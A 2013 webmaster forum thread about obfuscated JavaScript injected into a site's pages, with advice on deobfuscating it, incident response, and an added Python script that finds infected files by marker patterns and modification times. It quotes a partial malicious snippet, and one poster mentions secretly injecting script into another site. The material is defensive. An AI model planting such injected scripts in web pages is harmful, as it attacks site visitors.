Code hacked into our pages

Anyone have any idea what it was trying to do?



11:59 pm on Jan 7, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

Someone recently hacked into our server and inserted the following code into pretty much random locations on every .htm page on our site via some automated method. Can't see any side effects. Any idea what they were trying to do, so we can check if there was any further harm done or what to watch for?
<script type="text/javascript" language="javascript" >
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=[ LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS... NOT HEX CODE ];h=2;s="";if(zxc)


12:17 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member swa66 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

That's typical obfuscated code used by hackers. In essence the script calculates z from that n and then the eval(z) attacks your visitors.

Now to know what the script tried: you'd have to deobfuscate it. Usually the easiest is to take the obfuscated script on a sacrificial machine (read: virtual machine that you copy and wipe afterwards in case it does execute too much) and replace the eval near the end with an alert and run it: it'll show what it tried to execute.

This kind of thing is not without danger: most of those will exploit the browser or some plugin, or load next stages that will eventually do that depending on the browser type and version detected.

In essence the right thing to do:
- consider all your machines that visited your website or were used to manage the content on your website as hacked till proven otherwise - note: an AV scan is no proof.
- find out how they got in (that's not in this script), it's most likely something else like SQL injection, SSH, ... if you cannot find it (hackers that know what they do wipe their traces): you're in for a lot of work as you now need a full security audit to find vulnerabilities and correct them - if you do not do this it will only come back again and again and again.
- fix security of your server to prevent future break-ins
- figure out what the script they put on every page of your site actually did
- warn visitors that you got hacked and tell them what they were subjected to (esp if you have recurring visitors)


4:22 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

Oh [bleep]!
Thanks. It looks like it crawled through all the directories automatically, sequentially over a period of about an hour. It only touched the one domain on our server as far as we can tell. They must not have been too good of hackers, as they did not reset back the times on the changed files, which is how I discovered it. Otherwise it may have been months before we discovered it.

I had a nasty virus on my computer last week which I finally got rid of with some help, but this just happened yesterday.
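
The discovery method described in this post (modification times left unreset on the changed files), as an added example that is not part of the original thread: a Python sketch that finds pages carrying the string-splitting markers visible in the quoted snippet, then lists any other files modified in the same window. The function names, the 300-second slack and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Markers copied from the snippet quoted in the thread: property names split
# into concatenated pieces, so a search for "document.body" misses them.
MARKER = re.compile(r'document\[\s*"b"\s*\+\s*"ody"\s*\]|window\[\s*"doc"\s*\+\s*"ument"\s*\]')

def walk_files(root):
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            yield os.path.join(dirpath, name)

def infected_pages(root, exts=(".htm", ".html")):
    """Return [(path, mtime)] for pages containing a marker, oldest first."""
    hits = []
    for path in walk_files(root):
        if path.lower().endswith(exts):
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if MARKER.search(text):
                hits.append((path, os.path.getmtime(path)))
    return sorted(hits, key=lambda h: h[1])

def changed_in_window(root, hits, slack=300):
    """Other files modified between the first and last hit, +/- slack seconds."""
    if not hits:
        return []
    lo, hi = hits[0][1] - slack, hits[-1][1] + slack
    known = {p for p, _ in hits}
    return sorted(p for p in walk_files(root) if p not in known and lo <= os.path.getmtime(p) <= hi)

def build_demo_tree():
    """Constructed sample webroot: two injected pages, a clean one, a stray file."""
    root = tempfile.mkdtemp()
    bad = '<script>try{document["b"+"ody"]*=document}catch(e){}</script>'
    files = {"index.htm": ("<p>hi</p>" + bad, 1_000_000), "old.htm": ("<p>ok</p>", 500_000),
             "docs/a.htm": (bad, 1_003_000), "img/x.php": ("placeholder", 1_001_500)}
    for rel, (body, mtime) in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return root

if __name__ == "__main__":
    root = build_demo_tree()
    hits = infected_pages(root)
    print("injected:", [p for p, _ in hits], "also changed:", changed_in_window(root, hits))
```

Files that fall inside the window without matching a marker are the ones to inspect by hand, since the markers only cover this one injected snippet.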


8:12 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month


Holy ###. They couldn't just say

{ blah, blah }
until (heat-death of the universe)



:: counting on fingers ::
base 26? Each letter is a digit?

I merrily inserted javascript into one site for almost two years before I got bored and said Here I Am. But they'd left the door standing wide open; the technique would never have worked in a normal site. (Like, say, yours or even mine. Trust me on this.)


8:41 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

I believe there were probably exactly 456 (plus or minus) items in the "LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS", so yeah that's the way they stepped through them up to 456. The first few terms are: "1e","3o","4d","46","3l","4c"

I was thinking the other variable names may have been a clue to the writer, but zxc and asdg are basically keyboard neighbors. Personally, I'm a UNIX C programmer (from before there was a C++) and Windows and JS, as similar as it is, are not my forte.

As far as coming back, so far so good. I was afraid they may have hidden a cron job to reset them every night at the same time or a random time (how I would have done it :), but nothing so far.
